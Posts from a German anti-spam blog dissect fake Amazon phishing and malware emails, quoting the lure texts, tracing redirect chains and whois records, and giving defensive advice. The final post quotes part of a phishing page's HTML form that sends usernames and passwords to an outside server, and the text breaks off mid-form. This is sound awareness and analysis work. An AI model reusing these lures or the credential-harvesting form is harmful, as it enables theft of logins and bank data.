Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Schlagwortarchiv „Amazon“

Neues Authentifizierungsverfahren

Freitag, 19. Mai 2017

Keine Panik! Diese Mail kommt nicht von Amazon. Auch, wenn sie ein Amazon-Logo enthält. Jedes Kind kann eine derartige Grafik von „irgendwo aus dem Web“ mitnehmen und in eine HTML-formatierte Spam verbasteln.

Von: "Amazon.de" <service@amazon.co.uk>

Natürlich ist auch der Absender gefälscht. Wie der Spammer auf die Idee kommt, dass deutsche Kunden vom Support des britischen Amazon angeschrieben werden könnten, weiß ich nicht. Vielleicht macht Amazon das ja wirklich so. Das wäre zwar ein bisschen dumm, weil Amazon dann auf einer Mailadresse Schriftverkehr in vielen verschiedenen Sprachen bekäme, der erst einmal sortiert werden muss, und es wäre auch aus Kundensicht ein wenig verwirrend, aber was weiß ich, wie Amazon seinen Laden organisiert. Wahrscheinlicher ist es allerdings, dass der Spammer hier ein bisschen dumm ist. ;)

Logo: amazon.de
Guten Tag Tobias Rodde,

Ich will es mal so sagen: Der Empfänger hieß anders. Völlig anders. Woher der Spammer den Namen genommen hat, bleibt unklar. Ich halte es aber für möglich, dass etliche Empfänger dieser Phishing-Spam mit ihrem richtigen Namen angesprochen werden. Vermutlich ist dem Spammer beim Zusammenführen und Bereinigen seiner Datenbank die Zuordnung von Namen und Mailadressen ein bisschen durcheinandergeraten. Wenn er in den nächsten Tagen einen aufgeweckten Achtjährigen gefunden hat, der es für ihn richtig macht, wird dieses kleine Problemchen sicherlich beseitigt sein.

Aber ob dann der folgende Absatz eine gute Kundenansprache ist?

Diese E-Mail legt eine Reihe von Mindestanforderungen im Bereich der Sicherheit von Internetzahlungen fest. Die EBA-Leitlinien basieren auf den Vorschriften der Richtlinie 2007/64/EG2 („Zahlungsdiensterichtlinie“, „PSD“) über die Informationspflichten für Zahlungsdienste sowie die Pflichten von Zahlungsdienstleistern bei der Erbringung von Zahlungsdiensten . Überdies schreibt Artikel 10 Absatz 4 der PSD vor, dass Zahlungsinstitute über eine solide Unternehmenssteuerung sowie angemessene interne Kontrollmechanismen verfügen müssen.

Aha, und was hat der Kunde damit zu tun? Richtig: Nichts hat der Kunde damit zu tun, denn es betrifft ihn gar nicht. Weshalb steht es dann in der Spam? Richtig: Dieses von irgendwo abgeschriebene bürokratisch-juristische Geschwafel ohne jegliche Bedeutung für einen Kunden einer Internetklitsche hat genau eine Funktion. Es soll den Empfänger beeindrucken und einschüchtern.

Vielleicht freut sich der Amazon-Kunde ja auch darüber, dass sich Amazon (angeblich) im Mai des Jahres 2017 einmal dazu bequemt hat, sich um die Umsetzung einer EU-Richtlinie vom 11. November 2007 zu bemühen. Nein, diese literarisch ungenießbare EU-Juristenprosa braucht niemand zu lesen, aber auf der ersten Seite steht das Datum, und im Gegensatz zum dummen, asozialen und kriminellen Spammer, der hier ebenfalls in einer HTML-formatierten Spam darauf Bezug nimmt, gebe ich gern die Quellen an. Erfreulicherweise gibt es ja inzwischen so ein Internet, und natürlich sind die Veröffentlichungen des Amtsblattes der Europäischen Union auch dort verfügbar. ;)

Für Online-Zahlungen bedeutet dies, dass verpflichtend eine neue, sicherere Methode zur Kundenauthentifizierung eingeführt werden muss. Um die Sicherheit Ihrer Kundendaten zu gewährleisten ist ein Abgleich der hinterlegten Informationen obligatorisch.

Und, was hat der Kunde mit der Implementation einer neuen Methode zur Kundenauthentifizierung zu tun? Richtig: Nichts. Das ist eine Angelegenheit für Programmierer, und im Idealfall merkt der Kunde gar nichts davon.

Aber dem Spammer geht es mit seinem wirren Geschwurbel um etwas anderes, nämlich einen „Abgleich der hinterlegten Informationen“. Denn dem Opfer dieses Phishings soll glauben gemacht werden, dass es aus irgendeinem Grund (wissenschon, dummes EU-Recht) erforderlich sein soll, lauter Daten, die bei Amazon längst bekannt sind, noch einmal auf einer angeblichen Website von Amazon einzugeben. Natürlich gehen diese Daten nicht zu Amazon, sondern direkt zu gewerbsmäßigen Betrügern, was im Falle des Amazon-Logins sowie eventueller Kreditkarten- und Bankdaten sehr unangenehm für das Opfer dieses Phishings werden kann. Denn die Kriminalpolizei schläft nicht und wird schnell vor der Türe stehen, wenn sie dem Gelde zu den Verbrechern folgen will.

Übrigens: Es ist immer und ausnahmslos Unsinn, wenn man längst bekannte Daten wegen irgendeines Bullshits noch einmal eingeben soll. Diesen Unsinn kann man nur in Phishing-Spams lesen.

Bitte achten sie während des Authentifizierungsverfahrens auf mögliche Fehleingaben, sollten wir eine Abweichung zu den bei uns hinterlegten Daten feststellen, ist eine Sperrung Ihres Accounts unvermeidlich.

Das heißt zu gut Deutsch: „Wenn sie so doof sind, alle ihre bei Amazon bekannten Daten noch einmal einzugegeben, weil sie in einer Spam darum gebeten wurden, dann machen sie das wenigstens korrekt, damit unser Betrugsgeschäft reibungsloser läuft“. :mrgreen:

Konto bestätigen

Der Link geht auf eine Adresse, die über den URL-Kürzer bit.ly maskiert wurde, um Spamfiltern die Abfrage von Blacklists zu erschweren. Das richtige Amazon würde niemals mit einem solchen „Trick“ arbeiten.

Will ich doch mal nachschauen, wo die Reise hingeht:

$ lynx -mime_header "http://bit.ly/2qxUl9u" | grep "^Location"
Location: http://tinyurl.com/mvezu75
$ _

Aha, es geht von einem URL-Kürzer auf den nächsten URL-Kürzer. Der kürzt dann zwar nicht mehr, aber es soll ja auch die Spamfilterung erschwert und nicht wirklich gekürzt werden. Für solche Umleitungsorgien habe ich mir zum Glück mal ein kleines Skript¹ gemacht, weil sie eine Zeitlang in der Binäre-Optionen-Spam mit großer Penetranz genutzt wurden.

$ location-cascade "http://bit.ly/2qxUl9u"
301	http://bit.ly/2qxUl9u
301	http://tinyurl.com/mvezu75
301	http://judenurl.com/slowdownmonkey83
302	https://de-kundencenter-authentifizierung.com/wer/macht/parra/
Found	/795722/DEJApbOkS90MF8q/5VPeQwAXmqEjx6b/427610010560/oOkLqQjKN3YtwWp/sEN42eBULqQaMJF/
$ _

Oh, es geht in eine tolle, lange Domain, die von DE, Kundencenter und Authentifizierung faselt, aber nichts mit Amazon zu tun hat. Wer hat denn diese Domain registriert? Hui, ein whois offenbart, dass da bei der Registrierung richtige Adressdaten aus Dortmund angegeben wurden, mutmaßlich die Anschrift eines Menschen, dessen Identität von Kriminellen missbraucht wird und der jetzt mehrere Jahre seines Lebens Ärger mit dieser ganzen kriminellen Scheiße haben wird². Deshalb ist man immer sehr sparsam mit seinen persönlichen Daten und gibt diese niemals leichtfertig irgendwo an. Das mag in einer Zeit, in der überall erwartet wird, dass man naiv und unvorsichtig mit Daten umgeht, antiquiert wirken, aber wenn leichtgemachter gewerbsmäßiger Betrug auf Kosten des eigenen Lebens die neue Modernität ist, sollte niemand ein Problem damit haben, ein bisschen antiquiert zu sein. Natürlich kann man dann auch viele Angebote im gegenwärtigen Internet nicht nutzen, die erwarten, dass – oft ohne sachlichen oder technischen Grund – weit in die Privatsphäre hineinragende Daten eingegeben werden. Insbesondere rate ich strikt davon ab, das Geburtsdatum anzugeben. Es ist niemals erforderlich.

So, jetzt noch der Blick auf die Website… oh! Da gibt es jetzt noch eine Weiterleitung:

Screenshot einer Seite bei sedoparking.com, auf die jetzt weitergeleitet wird. -- de-kundencenter-authentifizierung.com -- Sie sind der Domain-Eigentümer und möchten wissen, wieso diese Domain anders als die anderen geparkten Domains aussieht? INFOS HIER...

Da hat wohl schon jemand den Stecker vom Server gezogen. Danke! ;)

Mit freundlichen Grüßen,
Ihr Amazon-Team

„Mein Amazon-Team“ ist das nur in einem sehr skurrilen Sinn des Wortes.

Mit dieser Servicemitteilung informieren wir Sie ?ber wichtige ?nderungen bez?glich Ihres Amazon Kontos.
Copyright © 1998-2017 Amazon.com. Alle Rechte vorbehalten.

Immer wieder das Gleiche bei den dummen Spammern. Sie haben ihre eigentliche Botschaft rübergebracht und sind sogar leidlich fehlerfrei durch die deutsche Sprache gestolpert, und am Ende der Nachricht sind die Gedanken schon wieder im Bordell und die Konzentration lässt nach. Und dann klappt es auf einmal auch mit den Umlauten nicht mehr…

Denn wenn sich der Spammer Mühe geben wollte, könnte er ja auch gleich arbeiten gehen.

Diese Spam ist ein Zustecksel meines Lesers M.S., der etwas vom „dümmsten aller Spammer“ dazu schrieb.

¹Nein, ich gewinne dafür keine Schönheitspreise. Aber es hat mir schon viel Handarbeit erspart, und ich hatte bis jetzt kein Bedürfnis, es besser zu machen.

²Ganz sicher wurden die Daten für etliche „Geschäfte“ benutzt. Warum ich die (leider leicht ermittelbare) Anschrift hier nicht auch noch zitiere, sollte jedem Leser klar sein: Da ist eine arme Seele wahrlich genug gestraft!

Kontoaktualisierung

Montag, 20. Februar 2017

Dies ist eine Spam, die Menschen mit einer halbwegs sicher konfigurierten Mailsoftware gar nicht zu Gesicht bekommen. Sie hat nämlich keinen Text, sondern verwendet eine über imgur (punkt) com eingebettete Grafik.

Natürlich hat diese Spam mit Amazon nichts zu tun. Ich habe sie empfangen. Ich käme niemals auf die Idee, Amazon zu benutzen und habe mich dort nicht registriert. Diese Spam geht an jeden, dessen Mailadresse in den Datenbanken der Spammer steht.

Von: Amazon.de <bwadetumd@pub.kiev.ua>

Diese Spammer hat zwar schon verstanden, dass man eine Absenderadresse fälschen kann, er ist aber intellektuell damit überfordert, den Absender so zu fälschen, dass das Ergebnis seiner „Mühe“ auch jemanden beeindrucken könnte. :mrgreen:

Sehr geehrte Damen und Heren, da wir stets um die Sicherheit unserer Kunden bemüht sind, haben wir unser Sicherheitssystem verbessert. Um das Sicherheitsupdate abzuschließen ist es unbedingt erforderlich, dass Sie Ihre bei Amazon hinterlegten Bankdaten aktualisieren. Bitte nehmen Sie sich einen Moment Zeit und folgen Sie unserem Verifizierungsprozess, um Ihr Kundenkonto auch in Zukunft wie gewohnt nutzen zu können. [Jetzt aktualisieren] Wir entschuldigen uns für die entstandenen Unannehmlichkeiten und bedanken uns für Ihr Verständnis. Ihr Amazon-Team

Wie schon gesagt: Es ist ein in einer HTML-formatierten Mail extern verlinktes Bild mit Text und nicht das, wonach es aussehen soll. Der ätzrot überlagerte Text „Spam“ ist natürlich von mir, denn ich möchte kein Bildhoster für Spammer werden und finde es schlimm genug, dass imgur (punkt) com den Kriminellen zurzeit sehr dienstbar ist. Das gesamte Bild ist verlinkt. Egal, wohin man klickt, man landet auf einer Website in der obskuren Domain sicherheit (strich) d3qVeMhk (punkt) top, die ganz sicher nicht von Amazon betrieben wird, denn Amazon hat eine eigene Domain für seine Website. Die Daten, die man dort eingibt, gehen nicht an Amazon, sondern an Kriminelle. Was diese Halunken mit den Bankdaten anfangen werden, kann sich hoffentlich jeder vorstellen – und wer es sich wirklich nicht vorstellen kann, frage einfach einmal bei der Polizei oder bei seiner Bank. Einmal ganz davon abgesehen, dass es nach nur ganz kurzem Nachdenken sehr schwer einsehbar ist, warum man Amazon gegenüber Daten nochmals angeben sollte, die bei Amazon längst bekannt sind und welchen Effekt das für „die Sicherheit“ bei Amazon haben sollte. Man muss nicht lange darüber nachdenken, um zu bemerken, dass die Vorwände aus typischen Phishing-Mails unsinnig sind.

Lobenswerterweise hat Amazon selbst auf seiner Website klare Worte dazu geschrieben:

Amazon E-Mails und SMS-Benachrichtigungen […] fragen Sie niemals nach persönlichen Informationen oder bitten um Datenverifizierung über einen Link in der E-Mail oder SMS.
Alle benötigten Daten müssen IMMER über die Amazon.de Website eingegeben werden. Nachrichten von Amazon enthalten daher nur Anleitungen, wie Sie Ihre Informationen auf der Amazon.de Website selbst verwalten können

Ich lege Amazon nahe, seine eigenen E-Mails auch digital zu signieren und seine Kunden darüber zu informieren, um den Phishing-Sumpf auf lange Sicht auszutrocknen.

Lachen und löschen – das ist die angemessene Haltung bei derartig plumpen Überrumpelungsversuchen. Und wenn man sich einmal nicht sicher ist: Niemals in die Mail klicken, immer die Website über ein Lesezeichen im Browser aufrufen! Wenn man sich dann anmeldet und alles wie gewohnt funktioniert, ohne dass man einen Hinweis sieht, hat man mit dieser ganz einfachen Vorsichtsmaßnahme einen Phishing-Versuch abgewehrt und sich selbst bis zu zwei Jahre voller Ärger aller Art mit Polizeien, Staatsanwälten und Untersuchungsrichtern erspart, denn natürlich wird bei gewerbsmäßigem Betrug ermittelt und natürlich ist der Inhaber eines zum Betrug verwendeten Kontos dabei immer die erste Adresse.

Amazon.de Kundenkonto – Information für Mailadresse

Donnerstag, 26. Januar 2017

Vorab: Natürlich kommt diese Mail nicht von Amazon. Es ist Phishing. Deshalb wird diese Mail hier auch erwähnt.

Anstelle von „Mailadresse“ steht im Betreff die Mailadresse des Empfängers – ganz so, als ob es nicht völlig klar wäre, dass eine E-Mail für die Mailadresse bestimmt ist, die als Empfänger eingetragen ist. Das klingt zwar nicht ganz so gut wie ein richtiger Name, kann aber vielleicht das eine oder andere schlichtere Gemüt überzeugen, sagt sich der Spammer Allerdings: Wenn das Telefon klingelte, und ein Unbekannter dort sagte, dass es sich um eine ganz persönliche Information für die angerufene und eigens noch einmal genannte Telefonnummer handele, bekäme wohl noch der Dümmste einen Anfall spontaner Heiterkeit. Genau so absurd ist die nochmalige Angabe der Mailadresse in einer Mail.

Angesichts der Tatsache, dass die Spammer nach diversen „Datenveröffentlichungen“ der letzten Jahre zu sehr vielen Mailadressen auch einen Namen haben, gehe ich davon, dass im Betreff auch der Name stehen kann. Das wirkt dann natürlich nicht so dümmlich und deutlich alarmierender.

Dem modernen Trend der Spammer folgend, hat auch dieser Spammer vollkommen auf Text verzichtet, um mit seinem Phishing durch die Spamfilter zu kommen. Was er seinen Lesern mitzuteilen hat, sagt er stattdessen in einem 43,5 KiB großen PNG-Bild, das einen Text transportiert. Wer ein anderes Betriebssystem als Microsoft Windows verwendet, stößt sich sofort an der für sein System fremdartigen Typografie. Arial sieht einfach nicht besonders gut aus. Das Bild sieht so aus:

Amazon Kundenschutz -- Donnerstag, 26. Januar 2017 -- Wir haben einen potenziell unbefugten Zugriff auf Ihr Amazon.de Konto festgestellt -- Guten Tag, -- unser Sicherheitssystem hat einen nicht durch Sie autorisierten Bezahlversuch mit Ihrem Amazon.de Kundenkonto festgestellt. Um sie vor finanziellen Schäden zu schützen, haben wir Ihr Kundenkonto temporär eingeschränkt. -- Damit Sie mit ihrem Amazon.de Kundenkonto wieder problemlos online bezahlen können, ist eine Bestätigung Ihrer bei uns angegebenen Daten erforderlich. Bitte klicken sie auf "Weiter (über den Sicherheitsserver)", um den Bestätigungsvorgang zu starten. -- Weiter (über den Sicherheitsserver) -- Warum ist dieser Schritt nötig? -- Dies ist notwendig, um Sie als rechtmäßigen Besitzer zu identifizieren. Wir möchten dadurch verhindern, dass sich Dritte Zugang zu Ihrem Amazon Kundenkonto verschaffen. Auch möchten wir Sie vor einem finanziellen Schaden und den damit verbundenen Folgen beschützen. -- © 1998-2017, Amazon.com Inc. oder Tochtergesellschaften

[Der überlagerte rote Schriftzug ist von mir, denn ich werde nicht gern Bildhoster für Spammer – aber die JPEG-Artefakte im Klickeknöpfchen sind original. Ich habe ein ursprünglich verlustfreies Format nach Bearbeitung verlustfrei wieder gespeichert. Man hat doch bei aller Stabilität der Betrugsmaschen jeden Woche etwas Neues in der Spam. Zum Beispiel verlustfreie PNGs mit JPEG-Artefakten.]

Was von einem Versuch, den „rechtmäßigen Besitzer zu identifizieren“ zu halten ist, der darin besteht, dass man alle längst bei Amazon bekannten Daten noch einmal eingibt, kann sich jeder durch eine Minute Nachdenken herleiten: Jemand, der sich das Amazon-Konto wirklich unterm Nagel gerissen hat, könnte sich alle diese Daten anschauen und sie sogar verändern. Aber für eine Betrügerbande werden die eingegebenen Daten sehr interessant sein.

Die gesamte Grafik ist ein Link. Dieser führt nicht etwa zur Website von Amazon…

$ location-cascade http://epl-digitalrefferycommunications2019.online/5P7BMBQYBD90N9MSOB96C7V5P8HZJQ6W1LUR0D7M7COOP
302	http://epl-digitalrefferycommunications2019.online/5P7BMBQYBD90N9MSOB96C7V5P8HZJQ6W1LUR0D7M7COOP
Found	https://amazon.de.kundenkonto-sicherheitsverifizierung.info
$ _

…sondern auf den „Sicherheitsserver“ einer Betrügerbande, der völlig sicher stellt, dass die Daten nicht an Amazon, sondern an die Betrügerbande gehen. Nach nur einer einzigen Weiterleitung – das ist für gegenwärtige Verhältnisse wenig – landet man in der Website in einer Subdomain der Domain kundenkonto (strich) sicherheitsverifizierung (punkt) info, die…

$ whois kundenkonto-sicherheitsverifizierung.info | grep '^Creation'
Creation Date: 2017-01-13T19:52:11Z
$ whois kundenkonto-sicherheitsverifizierung.info | grep '^Registrant' | head -5
Registrant Name: WhoisGuard Protected
Registrant Organization: WhoisGuard, Inc.
Registrant Street: P.O. Box 0823-03411
Registrant City: Panama
Registrant State/Province: Panama
$ _

…vor 13 Tagen jemand über einen Dienstleister aus dem sonnigen Panama anonym registriert hat. Zusammem mit der Subdomain amazon.de dieser ansonsten sehr unhandlich benannten Domain soll für diese Phishing-Kampagne der Eindruck erweckt werden, es handele sich um eine Domain von Amazon.

Wer dort Daten eingegeben hat, hat ein Problem, denn diese Daten sind jetzt in den Händen von Kriminellen. Wenn Kreditkartendaten eingegeben wurden, sollte die Karte sofort gesperrt werden, um den Schaden klein zu halten. Natürlich ist auch das Amazon-Konto kompromittiert und wird vermutlich schon für betrügerische Geschäfte unter Missbrauch der Identität eines anderen Menschen verwendet, so dass auch Amazon so schnell wie möglich von der Sache unterrichtet werden sollte.

Und dabei gibt es gegen Phishing einen ganz einfachen Schutz. Der besteht allerdings nicht in einer Schlangenöl-Software oder einem auf dem Computer gemalten Heiligenbildchen, sondern in einer Gewohnheit, die man sich recht einfach angewöhnen kann: Niemals in eine E-Mail klicken, weil eine E-Mail eines Unternehmens dazu auffordert, sondern immer die Startseite desjenigen Unternehmens im Browser aufrufen, das einem zum Vorbeischauen auffordert. Die Webbrowser haben dafür seit Mosaic Netscape 0.95 beta aus dem Jahr 1994 sehr praktische Lesezeichenfunktionen, die es einem sehr erleichtern können, sich diese Angewohnheit anzugewöhnen. (In früheren Webbrowsern wie etwa dem vorher sehr populären NCSA Mosaic musste man dafür noch eine HTML-Datei im Editor bearbeiten.)

Wenn man sich auf der garantiert richtigen Seite eingeloggt hat und dort feststellt, dass man trotz der erschröcklichen Mails von eingeschränkten oder gesperrten Accounts keinerlei Probleme bei der Nutzung hat und auch keine Hinweise angezeigt bekommt, dass man handeln muss, hat man übrigens einen Phishing-Versuch erfolgreich abgewehrt. Das war einfach und hat sehr viel mit Ärger verschwendete Lebenszeit eingespart.

Bitte, tut das einfach! ;)

Diese Spam ist ein Zustecksel meines Lesers S. S.

Vorname Nachname Ihre Abrechnung 60600263 vom 26.04.2016

Dienstag, 26. April 2016

Diese Spams sind die Pest des heutigen Tages. Es gibt unglaublich viel davon.

Anstelle von „Vorname Nachname“ stand hier der richtige bürgerliche Name des Empfängers. Den hätte der Spammer zwar auch in das Empfängerfeld schreiben können, aber in der Betreffzeile wirkt es nun einmal alarmierender, und alarmieren will dieser Spammer. Denn er hat frische Schadsoftware anzubieten, die man sich nach einer Überrumpelung installieren soll, indem man einen Mailanhang öffnet.

Von: Rechnungsstelle Amazon AG <ebay (at) ebay (punkt) de>

So so, eBay und Amazon sind neuerdings fusioniert… schade eigentlich, dass die das selbst noch gar nicht gemerkt haben. :mrgreen:

Der Spammer will hier natürlich die Kunden zweier beliebter Websites erreichen und zur Installation von Schadsoftware motivieren – aber die Art, wie er es getan hat, ist so, als würde in einer Absenderadresse als Klarname „etwas bei Volkswagen“ angegeben, und dazu eine Mailadresse in der BMW-Domain. Wenn man so etwas sieht, kann man sofort Zuckungen im Löschfinger bekommen. Es handelt sich ganz sicher um eine Spam von Kriminellen, deren Absender gefälscht ist.

Es gibt genau die gleiche Masche (mit geringfügigen Änderungen, aber ebenfalls mit dem Merkmal der erwähnten Anschrift) auch als angebliche Mail mit dem Absender „Rechtsanwalt GiroPay AG“ und der gefälschten Absenderadresse service (at) giropay (punkt) de und vermutlich in einigen weiteren Geschmacksrichtungen mehr.

Sehr geehrte(r) Vorname Nachname,

leider haben wir festgestellt, dass unsere Zahlungsaufforderung NR606002630 bisher ergebnislos blieb. Heute gewähren wir Ihnen nun letztmalig die Möglichkeit, den nicht gedeckten Betrag der Firma Amazon AG zu begleichen.

Ganz schlimme Zahlungsaufforderung. Sie hat eine Nummer. Denn Nummern sind wichtig. Um was geht es? Steht da nicht. Von wann ist sie? Steht da nicht. Objektiv steht da gar nichts und man soll völlig grundlos Geld bezahlen – wenn man mal von dem kleinen Patzer des Autors absieht, dass man „nicht gedeckte Beträge von Amazon begleichen“ kann. Schön, dass man seinen Beitrag dazu leisten darf, Amazon vor der Insolvenz zu bewahren.

Niemand würde sich so unklar ausdrücken, wenn es um Geld geht.

Nachdem so wenig Konkretes gesagt wurde, hat der Spammer allerdings auch etwas Konkreteres mitzuteilen – auch wenn der Empfänger das schon längst kennt:

Verbindliche Personalien:

Vorname Nachname
Straße Hausnummer
Postleitzahl Wohnort

Tel. Telefonnummer

Hier steht im Original der Name und die korrekte Anschrift des Empfängers nebst seiner korrekten Telefonnummer. Ich habe zurzeit mehrere derartiger Spams von Lesern, die allesamt eine korrekte Anschrift und eine korrekte Telefonnummer enthalten. Wo die Daten herkommen, ist mir zurzeit unklar – aber Spammer sind seit mehreren Jahren darum bemüht, auf allen nur denkbaren Wegen zu möglichst vielen Mailadressen weitere Daten zu erhalten und in großen Datenbanken zusammenzuführen. Meine spontane Vermutung ist, dass diese Daten über trojanische Apps aus Smartphone-Adressbüchern abgegriffen werden. In einem Fall war die angegebene Telefonnummer seit mindestens einem Jahr nicht mehr aktuell (das Mobiltelefon ging verloren). Der Datenbestand, aus dem sich die Spammer bedienen, scheint also mindestens ein Jahr alt zu sein. Allerdings sind auch viele Adressbücher in Smartphones nicht die Aktuellsten. Näheres dazu kann ich aber erst sagen, wenn mir ein paar Fälle bekannt sind, in denen die Quelle der Daten völlig klar ist, weil zum Beispiel eine ganz spezifische, nur in einem Kontext verwendete E-Mail-Adresse vom Spammer verwendet wurde, so dass man der Sache auf die Spur kommen kann.

Wer hierzu weitere Hinweise geben möchte, kann einfach einen Hinweis in den Kommentaren geben, so dass alle Leser etwas davon haben. Ich gehe davon aus, dass Millionen von diesen Spams unterwegs sind – und ich selbst habe „leider“ nur eine nicht-personalisierte mit der gleichen Schadsoftware-Brut. (Wer nach einer solchen Spam zu Recht etwas paranoid geworden ist: Natürlich kann man sich hier einfach einen Namen und eine Mailadresse für den Kommentar ausdenken, eine Registrierung ist nicht erforderlich.)

Das ist ein gutes Beispiel dafür, warum Datenschutz wichtig ist. Eine ansonsten ganz durchschnittliche Schadsoftware-Spam wird ungleich gefährlicher, wenn sie mit solchen Daten personalisiert wurde.

Aufgrund des andauernden Zahlungsverzug sind Sie verpflichtet dabei, die durch unsere Inanspruchnahme entstandene Gebühren von 44,40 Euro zu bezahlen. Bei Fragen oder Unklarheiten erwarten wir eine Kontaktaufnahme innerhalb von drei Werktagen. Um weitete Kosten auszuschließen, bitten wir Sie den ausstehenden Betrag auf unser Konto zu überweisen. Berücksichtigt wurden alle Zahlungseingänge bis zum 25.04.2016.

So so, Kontaktaufnahme in drei Tagen – und eine Kontaktmöglichkeit ist nicht angegeben. Dafür wird es richtig teuer. Wofür, wird nicht gesagt. Sind halt Gebühren. Die entstehen halt. Wisst schon. Wer erschrocken ist und von seiner leichten Panik verdummt etwas Näheres erfahren möchte…

Eine vollständige Kostenaufstellung Nr. 606002630, der Sie alle Positionen entnehmen können, fügen wir bei.

…muss einen Anhang einer E-Mail öffnen, die mit gefälschtem Absender einen falschen Eindruck erwecken will, um rauszukriegen, um was zum hackenden Henker es hier überhaupt geht.

In den mir vorliegenden E-Mails ist dieser Anhang ein ZIP-Archiv, in dem ein ZIP-Archiv liegt, in dem eine ausführbare Datei für Microsoft Windows liegt. In einem Exemplar gibt es keine doppelte Verpackung, sondern nur eine einfache. In keinem Fall handelt es sich um ein Dokument, auch wenn das Piktogramm einen falschen Eindruck vom Charakter der Datei erwecken will.

Es handelt sich völlig klar um Schadsoftware. Diese wird zurzeit von den meisten Antivirus-Programmen nicht als Schadsoftware erkannt. Wer sich auf diesen Schutz verlassen hat, ist verlassen. So genannte Antivirus-Programme funktionieren nämlich nicht. Und wenn man sich wegen dieser Programme sicher fühlt und deshalb glaubt, unüberlegt handeln zu dürfen, sind diese Programme sogar gefährlich und arbeiten der Organisierten Kriminalität zu.

Deshalb ist es wichtig, dass man derartige Spam selbst erkennt und niemals darin herumklickt, sondern sie löscht. (Wer mag, kann natürlich gern zur Polizei gehen und Strafanzeige erstatten, aber über die Ermittlungschancen sollte man sich keine Illusionen machen.) Grundsätzlich sollte niemals ein E-Mail-Anhang geöffnet werden, der nicht vorher explizit und über einen anderen Kanal als E-Mail abgesprochen wurde – und niemand sollte sich vom Absender einer Mail verblenden lassen, denn dieser ist beliebig fälschbar¹.

Wir erwarten die Zahlung bis zum 28.04.2016 auf unser Bankkonto. Falls wir bis zum genannten Termin keine Überweisung einsehen, sehen wir uns gezwungen Ihre Forderung an ein Gericht abzugeben. Alle damit verbundenen Zusatzkosten werden Sie tragen.

Jedes Unternehmen, das auch Geld bekommen möchte, würde an dieser Stelle seine Bankverbindung und den Betrag angeben. Der Spammer will aber nur, dass ein Anhang geöffnet wird.

Sollten Sie den Rechnungsbetrag bereits vorab an uns gezahlt haben, ist dieses Schreiben nur für Ihre Unterlagen bestimmt. Sollten Sie Fragen haben, stehen wir Ihnen gerne zur Verfügung.

Klar, eine E-Mail nur für meine Unterlagen… :D

Und die Fragen stellt man wo? Ach, Kontaktdaten gibts keine.

Mit freundlichen Grüßen

Rechnungsstelle Silas Krantz

„Freundlich“ wie eine Ohrfeige

Dein Schadsoftware-Spammer mit dem aktuellen Erpressungstrojaner

¹Die ganzen Internet-Unternehmen könnten damit anfangen, ihre Mail digital zu signieren, um dieser Form der Kriminalität (und dem Phishing) nach und nach das Wasser abzugraben. Sie tun dies nicht. Die technische Lösung für die digitale Signatur von E-Mail steht seit 25 Jahren jedem zur Verfügung, der sie nutzen möchte. Sie tun dies trotzdem nicht. Die technische Lösung steht seit über anderthalb Jahrzehnten in freier und kostenlos nutzbarer Form jedem zur Verfügung, der sie nutzen möchte. Sie tun dies trotzdem nicht. Die ganzen Unternehmen, die sich angesichts der gegenwärtigen Kriminalität aus nicht nachvollziehbaren Gründen (ich nenne sie einfach mal in Ermangelung besserer Erklärungen Verantwortungslosigkeit und Arschlochhaftigkeit) weigern, ihre Kunden zu schützen, indem sie den Verfasser und unverfälschten Inhalt ihrer E-Mails überprüfbar sicherstellen, tragen eine erhebliche Mitschuld am Erfolg der gegenwärtigen Internet-Kriminalität, vom Phishing bis zum Erpressungstrojaner.

Danke an die diversen Einsender dieser wirklich gefährlichen Spam! Ein spezieller Dank geht an Hans.

Ihr Amazon-Konto wurde ausgesetzt

Mittwoch, 23. März 2016

Und ich habe doch gar keines… ;)

Von: amazon (punkt) powering (at) msg (punkt) afterbuy (punkt) de
An: gammelfleisch (at) tamagothi (punkt) de

Diese Spam geht an alle möglichen aus dem Internet eingesammelten Adressen, und der Spammer fälscht zwar den Absender, ist aber zu doof dazu, es so zu machen, dass der Absender auch wirklich nach Amazon aussieht. Aber zum Ausgleich…

Hallo von Amazon-Sicherheit,

…sieht die Anrede auch nicht ganz so überzeugend aus. :D

Hier ist eine wichtige Nachricht von Amazon.de. Bitte lesen Sie diese Nachricht sorgfaeltig durch, da sie Ihr Kundenkonto bei Amazon.de betrifft.

Wir ueberpruefen routinemaessig Kundenkonten. Bei der Pruefung Ihres Kundenkontos erhaertete sich leider unser Verdacht, dass ein Unberechtigter Zugriff auf dieses hatte.

Aus diesem Grund haben wir Ihr Kundenkonto voruebergehend gesperrt. Niemand kann derzeit auf Ihr Kundenkonto zugreifen, Sie eingeschlossen.

Oh, wie bitter! Amazon nimmt jetzt wohl auf seiner Website über eine noch völlig unbekannte Schnittstelle den Besuchern Fingerabdrücke ab, und wenn jemand das richtige Passwort eingibt, aber den falschen Fingerabdruck hat, dann wird einfach der Account gesperrt. Und es gibt nur eine einzige Möglichkeit, was man dagegen tun kann:

Um Ihr Kundenkonto zu entsperren, befestigt auf diesem E-Mail [sic!] sie haben das Formular.

Bitte laden Sie das Formular und geben Sie Ihre Daten.

Man muss den Anhang einer E-Mail öffnen, die von Unbekannten mit gefälschtem Absender und voller falscher Behauptungen in recht fragwürdigem Deutsch versendet wurde. Auch, wenn da diesmal keine Schadsoftware dranhängt¹, sondern nur ein krimineller Versuch, an die Passwörter anderer Leute zu kommen, ist das Öffnen von unverabredeten Anhängen in E-Mails immer eine ganz schlechte Idee.

Übrigens sieht das Formular im angehängten HTML-Dokument – was nach der stümperhaft formulierten Phishing-Spam gar nicht zu erwarten war – recht gut aus:

Screenshot der angehängten Phishing-Seite

Das gesamte Design besteht nicht etwa aus Texten, sondern ist ein großes Bild, das bei einem anonym nutzbaren, kostenlosen Bildupload-Dienst hinterlegt wurde. Natürlich habe ich directupload (punkt) net schon mit einer Mail darauf hingewiesen, dass der Dienst von Spammern missbraucht wird und erwarte deshalb eine baldige Löschung dieses Blendwerkes. Leider ist das nur ein Tropfen auf dem heißen Stein; ein neues Bild ist schnell hochgeladen und ein paar Millionen Spams sind schnell versendet, der Schaden wird schnell seine naiven Opfer auf anderem Wege finden. :(

Was auch immer man in diesem angehängten HTML-Dokument eingibt, geht nicht etwa zu Amazon, sondern…

<form method="post"
action="http://www.desentupidoraapolinario.com.br/zmd/404.php">
<input
style="top: -83px; height: 17px; left: -949px; width: 223px;"
id="user" name="user" value="" type="text" required/>
<input style="top: -99px; height: 17px; left: -949px; width: 223px;"
id="pass" name="pass" value="" type="password" required/><input
